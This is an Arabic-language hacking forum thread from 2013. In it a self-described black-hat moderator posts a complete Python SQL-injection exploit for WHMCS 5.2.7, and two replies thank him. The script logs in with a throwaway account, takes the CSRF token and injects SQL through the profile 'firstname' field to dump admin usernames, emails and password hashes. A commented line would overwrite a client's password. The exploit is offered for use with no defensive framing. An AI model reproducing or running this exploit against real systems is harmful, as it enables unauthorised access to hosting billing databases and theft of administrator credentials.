نحن مع غزة
الـرئـيـسـيـة الـمـنـتـدى سـؤال & اجـابـة الـتـبـرع بـالـدم الاسـتـضـافـة هـلال لـيـنـكـس الـقـرآن الـكـريـم Dz-SeC team


التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"


مطلوب مشرفين على كامل اقسام المنتدى

أخي / أختي , إن تسجيل عضوية جديدة في منتدى شبكة الجزائر للجميع لا يهدف إلى زيادة الأعضاء مطلقا
فلا خير في عضوية عدد مشاركاتها صفرا فنحن نرفض يوميا الكثير من العضويات المشكوك في أمرها
سواء كان هدفها الإعلانات الغير شرعية أو تخريب الموضوعات الخ , كل هذا حتى يبقى المنتدى
ساحة جادة عطرة تجود بالخير لكل زوارها وأعضائها
وصدقة جارية لكل من يشارك في كتابة معلومة تفيد غيره سوف يشكر الله عليها وهو في جوف الأرض ...

لذلك نطلب منك التسجيل بل ونلح عليك إن كان هدفك هو أن تصنع صدقة جارية لا تنقطع إلى يوم الدين بمساعدة إخوانك في نشر الخير .

للتسجيل اضغط هنا وأملأ البينات المطلوبة بشكل صحيح ومن ثم انتظر حتى نقوم بتفعيل حسابك وابدأ رحلتك في صناعة صدقة جارية .

وتذكر قول سيد الخلق " إذا مات ابن آدم انقطع عمله إلا من ثلاث صدقة جارية أو علم ينتفع به أو ولدٍ صالح يدعو له "

   

[ مـنتدى حمايه المواقع والسيرفرات | Hacking Site's & Servers ] حمايه وأختراق المواقع والسيرفرات باحدت الطرق والادوات ..

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم 04/10/2013, 23:34   المشاركة رقم: 1
المعلومات
الكاتب:
 sniffer  
اللقب:
Moderator
الصورة الرمزية
 
الصورة الرمزية sniffer

البيانات
التسجيل : Jul 2013
العضوية : 5329
الاهتمامات :
الإقامة : Root
المواضيع : 20
الردود : 39
المجموع : 59
بمعدل : 0.01 يوميا
الاختراقات : [Sniffer]
مجتمعنا : [لم اسجل]
الصنف : Black Hat Hacker
آخر تواجد : 24/08/2015/18:34
سبب الغياب : حاظر
معدل التقييم: 13
نقاط التقييم: 10
sniffer is on a distinguished road
شكراً: 10
تم شكره 5 مرة في 4 مشاركة

Algeria


الإتصالات
الحالة:
sniffer غير متواجد حالياً
وسائل الإتصال:

Red face WHMCS 5.2.7 Vulnerability



كود:
  #!/usr/bin/env python
# 2013/10/03 - WHMCS 5.2.7 SQL Injection
# http://localhost.re/p/whmcs-527-vulnerability

url = 'http://clients.target.com/' # wopsie dopsie
user_email = '[email protected]' # just create a dummie account at /register.php
user_pwd = 'hacker'

import urllib, re, sys
from urllib2 import Request, urlopen
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17
Safari/537.36"

def exploit(sql):
print "Doing stuff: %s" % sql
r = urlopen(Request('%sclientarea.php?action=details' % url,
data="token=%s&firstname=%s&lastname=1&companyname=1&email=%s&paymentmethod=none&billingcid
=0&address1=1&address2=1&city=1&state=1&postcode=1&country=US&phonenumber=1&save=Save+Ch
anges" % (user[1], 'AES_ENCRYPT(1,1), firstname=%s' % sql, user_email), headers={"User-agent": ua,
"Cookie": user[0]})).read()
return re.search(r'(id="firstname" value="(.*?)")', r).group(2)

def login():
print "Getting CSRF token"
r = urlopen(Request('%slogin.php' % url, headers={"User-agent": ua}))
csrf = re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")',
r.read()).group(2)
cookie = r.info()['set-cookie'].split(';')[0]
print "Logging in"
r = urlopen(Request('%sdologin.php' % url, data="username=%s&password=%s&token=%s" %(user_email,
user_pwd, csrf), headers={"User-agent": ua, "Cookie": cookie})).read()
if 'dologin.php' in r:
sys.exit('Unable to login')
else:
return [cookie, re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")',
r).group(2)]

user = login()
print exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)') # get
admins
print exploit('(SELECT * FROM (SELECT COUNT(id) FROM tblclients) as x)') # just get a count of clients

# oh you want to be evil
#exploit("'DISASTER', password=(SELECT * FROM (SELECT password FROM tblclients WHERE email='%s' LIMIT 1) as
x)#" % user_email)
References:

[]



آخر مواضيع » sniffer
» Metasploit Unleashed at Reverse Space
» Gamma FinFisher hacked
» Blackhat USA 2013 Videos
» apache tomcat remote 0day
» WHMCS 5.2.7 Vulnerability
المزيد من مواضيع » sniffer
عرض البوم صور sniffer   رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ sniffer على المشاركة المفيدة:
ViRuS_Ra3cH (05/10/2013)
قديم 05/10/2013, 01:28   المشاركة رقم: 2
المعلومات
الكاتب:
 ViRuS_Ra3cH  
اللقب:

الإتصالات
الحالة:
ViRuS_Ra3cH غير متواجد حالياً
وسائل الإتصال:

mawdjouda bsiga okra ou trika holwa

thnx bro

عرض البوم صور ViRuS_Ra3cH   رد مع اقتباس
قديم 09/03/2015, 18:15   المشاركة رقم: 3
المعلومات
الكاتب:
 3b6  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
3b6 غير متواجد حالياً
وسائل الإتصال:

اخي [] انت مبدع بكل ماتعنيه الكلمة

عرض البوم صور 3b6   رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

« Login r00t without password | أسهل ثغرة لختراق المواقع للمبتدئين »

حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف)
 

(أظهر الكل الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 33
1nj3ct0r , 3b6 , 3nj0y , adeel , Ahm2d , asesino04 , babay , big-lion911 , bn6a , Crazypc , Cyb3r.Gh0st , dz-hacker16 , Federal , GhOsT SkIkDa , H A C K , hhhack , خرازه هكر , Jockero , Me$uT.dZ , MR OsSaMa , MR>XKiLLeR , nadir king , napster² , ndz2015 , predator250 , rezouka , S1LV3rS3rf3r , sa511 , scorpionoir009 , simoow , sniffer , ukaplus , ViRuS_Ra3cH

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
كود [IMG] متاحة
كود HTML معطلة
الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
[web applications] - WHMCS CSRF All Versions Vulnerability ADMINISTRATOR قسم الثغرات 0 23/06/2013 21:50
[web applications] - WHMCS 4.x SQL Injection Vulnerability ADMINISTRATOR قسم الثغرات 0 14/05/2013 04:40
[web applications] - WHMCS 5.x Authentication Bypass Vulnerability ADMINISTRATOR قسم الثغرات 0 01/01/2013 18:00
WHMCS 5.1.3 Full Path Disclosure vulnerability asesino04 [ منتدى الثغرات & أكتشافات الاعضاء ] 1 22/12/2012 12:43
[web applications] - WHMCS v4.5.2 Blind SQL Injection Vulnerability ADMINISTRATOR قسم الثغرات 0 22/10/2012 22:49

الساعة معتمدة بتوقيت جرينتش +1 . الساعة الآن : 11:19.
Copy Right Des 2010 - 2014 To is|sec Organization, Des By  yasMouh 
Powered By vBulletin Special Edition, Secured By Dz-SeC team
Support by Dz-SeC team




RSS RSS 2.0 XML MAP HTML


إتصل بنا - is|sec Organization - الأرشيف - اعلى

 
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115